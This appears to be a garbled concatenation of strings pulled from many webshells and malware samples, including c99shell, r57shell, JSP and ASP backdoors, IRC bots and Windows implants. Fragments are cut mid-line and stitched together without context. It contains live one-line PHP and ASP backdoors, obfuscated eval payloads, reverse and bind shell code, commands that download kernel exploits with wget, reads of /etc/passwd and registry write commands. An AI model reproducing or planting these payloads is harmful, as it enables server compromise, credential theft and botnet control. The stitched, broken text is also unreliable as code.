name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! 
can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and 
directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' 
of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep 
::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? 
\"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? 
\"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int 
i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? 
urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? 
echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. 
command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win 
dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... 
a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! 
victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? 
system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. 
/file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package 
wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which 
wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 microsoft enhanced cryptographic provider v1.0\\system32\\svchost.exe:repeat\x0d\x0adel %s\x0d\x0aif exist %s goto :repeat\x0d\x0adel %%0.php?compname=/path_active.php?compname=/fetch_updates_pops.php?compname=/is_array_own.php?compname=/checkpkg.php?compname=/versionchk.php?srs=/vtris.php?srs=/vtris1.php?srs=/fetch_updates_step.php?compname=/c wmic diskdrive list brief > /petal_active.php?compname=percf001.dat_percf001.datcurl_easy_performhttp://199.91.173.45/percf002.dathttp://199.91.173.45/update_dll.dllhttp://199.91.173.45/libcurld.dll!microsoft!winusb.exec:\\intel\\logs\\file.pdbc:\\users\\tranchulas\\documents\\visual studio 2008\\projects\\upload\\release\\upload.pdbc:\\users\\cert-india\\documents\\visual studio 2008\\projects\\ufile\\release\\ufile.pdbdoworku
1 dgmnoep/%s%s%s/?%s=control panel\\dehttps=https://%snetwork.proxy.ht2http=http://%s:%control panel\\denetwork.proxy.ht&ol1ms9c
1 99e2428cca4309c68aaf8c616ef3306582a64513e55c786a864bc83dafe0c78585b692047273b0e55275102c664c5217e76b8e67f35fce385e4328ee1ad139ea6aa26345c4f93000dbbc7ef1579d4fhttp/1.1 200 ok
1 http://arm.533.nettftpd32.hlptimeouts and ports should be numerical and can not be 0t
1 dom4!nuserp4ss273ce6-b29f-90d618c0ace123dxace123dxl!ace123dx!@#x/catelog/login1.asp~dftmp$$$$$.1get /query.asp?loginid=loadconfigfromreg faildedloadconfigfrombuildin success/photoe/photo.asp httppost /photos/photo.asppcc_ident$$$--hellowrod--$$$.?avpcc_basemod@@ps1=rk# \\u@\\h:\\w \\$unset ls_options;uname -a[diskio]/tmp/.secure\x7felf\
